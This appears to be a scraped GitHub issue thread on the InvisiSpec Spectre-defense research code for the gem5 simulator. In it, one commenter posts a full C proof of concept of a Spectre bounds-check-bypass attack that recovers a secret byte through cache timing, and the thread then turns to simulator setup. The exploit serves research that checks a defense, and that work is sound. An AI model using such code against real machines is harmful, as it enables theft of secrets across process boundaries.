Comments (11)
I'd like to see what changes the InvisiSpec code has done to gem5, but this repo doesn't have the history on what modification has been done, so I tried to rebase the code to a gem5 revision. It's a big change with nearly 3k lines of modifications.
https://git.wehack.space/gem5/commit/?h=invisispec-1.0&id=169588684b179baed4f5f93d8be52c51aa08f06d
I found the code has added the rdtscp in src/arch/x86/isa/insts/system/msrs.py and src/arch/x86/isa/macroop.isa.
from invisispec-1.0.
I've just written a PoC code which evicts all the things in the cache, then use Spectre to read the secret value in the cache. I also rebased the code to a gem5 revision which has rdtscp implementation. (https://git.wehack.space/gem5/log/?h=is-rebase-new3-rdtscp) My attack code is as follows:
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>
/* default: 64B line size, L1-D 64KB assoc 2, L1-I 32KB assoc 2, L2 2MB assoc 8 */
#define LLC_SIZE (2 << 20)
uint8_t dummy[LLC_SIZE];
size_t array_size = 4;
uint8_t array1[200] = {1, 2, 3, 4};
uint8_t array2[256 * 64 * 2];
uint8_t X;
uint8_t victim(size_t idx)
{
if (idx < array_size) {
return array2[array1[idx] * 64];
}
}
int main()
{
unsigned long t[256];
volatile uint8_t x;
victim(0);
victim(0);
victim(0);
victim(0);
victim(0);
memset(dummy, 1, sizeof(dummy)); // flush L2
X = 123; // set the secret value, and also bring it to cache
_mm_mfence();
size_t attack_idx = &X - array1;
victim(attack_idx);
for (int i = 0; i < 256; i++) {
unsigned int junk;
unsigned long time1 = __rdtscp(&junk);
x ^= array2[i * 64];
unsigned long time2 = __rdtscp(&junk);
t[i] = time2 - time1;
}
printf("attack_idx = %ld\n", attack_idx);
for (int i = 0; i < 256; i++) {
printf("%d: %d, %s\n", i, t[i], (t[i] < 40)? "hit": "miss");
}
}
When running ./build/X86_MESI_Two_Level/gem5.fast configs/example/se.py --num-cpus=1 --mem-size=4GB --cpu-type=DerivO3CPU --needsTSO=1 --scheme=UnsafeBaseline --ruby -c attack
I can see 123: 30, hit
and others miss, while changing UnsafeBaseline to SpectreSafeInvisibleSpec, all the lines miss.
from invisispec-1.0.
The version of GEM5 that we started with does not have good support for serializing "rdtscp" instructions, resulting in incorrect measurement of execution time. After hacking the simulator, we made the attack work, but it is required to use 2 "rdtscp" instructions, where the first one works as a "fense" and the second one works as the real "rdtsc" instruction.
We just uploaded the attack code. Please find it under the directory "attack_code".
Also, InvisiSpec requires modifying the cache, and we only did it for MESI_Two_Level.
from invisispec-1.0.
Thank you so much for your response.
Using --caches with --scheme=SpectreSafeInvisibleSpec , gives the below error:
gem5.opt: build/X86_MESI_Two_Level/mem/cache/cache.cc:192: void Cache::satisfyRequest(PacketPtr, CacheBlk*, bool, bool): Assertion `pkt->hasRespData()' failed.
Program aborted at tick 844000
So, I had to use --ruby (the example scripts use ruby too). I ran the below command:
build/X86_MESI_Two_Level/gem5.opt --outdir=m5out configs/example/se.py --cpu-type=DerivO3CPU --needsTSO=0 --scheme=UnsafeBaseline --ruby --l1d_assoc=8 --l2_assoc=16 --l1i_assoc=4 -c spectre_full.
Spectre attack is not working with the above command, where spectre_full is the binary.
for the attack code provided by you.
However, Spectre attack works when I run:
build/X86_MESI_Two_Level/gem5.opt configs/learning_gem5/part1/two_level.py spectre_full
two_level.py creates standard caches instead of ruby simulated caches.
So,could you please let me know how did you run the attack using --ruby. Could you please share the command/script used to run spectre, if possible.
I have tried tweaking various config options as well as CACHE_HIT_THRESHOLD to run the attack with ruby, but without any success. Also, I have tried using most of the config options in run_spec_from_ckpt.sh without success.
from invisispec-1.0.
For the first problem, the InvisiSpec mode only works under ruby mode. It is because we added new transactions, such as the invisible request, validation, exposure (details in the InvisiSpec paper). We only modified the ruby mode to handle these requests. This is why the classical cache mode does not work.
For the second problem, it is wired that the spectre code does not work. We are looking into it, and hopefully can get back to you soon.
from invisispec-1.0.
Thanks for the quick reply.
Would significant changes to the existing code be required to get InvisiSpec mode to work in standard cache mode?
from invisispec-1.0.
I think it requires some changes. Basically, you need to add support to handle these new requests.
from invisispec-1.0.
Could you please confirm this for me:
You ran the attack with scheme as UnsafeBaseline in cache mode and showed your defense against attack with scheme as
SpectreSafeInvisibleSpec in Ruby mode. Am I missing something here?
from invisispec-1.0.
from invisispec-1.0.
Request you to add the branch you used to test the attack code.
from invisispec-1.0.
@mytbk Why is the delay of 20 when I use the above code? Can you run the spectre attack under the option of UnsafeBaseline? This code is a modification of the base mountain on InvisiSpec, but it can run a spectre attack in the case of UnsafeBasiline. https://github.com/gururaj-s/cleanupspec . In this code, clflush and rdtscp seem to work. But there is error under other options.
from invisispec-1.0.
Related Issues (8)
- How to change cache latency in your design?
- How to use the example scripts? HOT 2
- Arm full system simulation issue HOT 1
- Error while building HOT 1
- Error while building Unrecognized function name: 'queueMemoryRead_MachineID_Addr_Cycles': HOT 1
- core dump on --scheme=SpectreSafeInvisibleSpec run HOT 1
- L2 Latency set incorrectly
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from invisispec-1.0.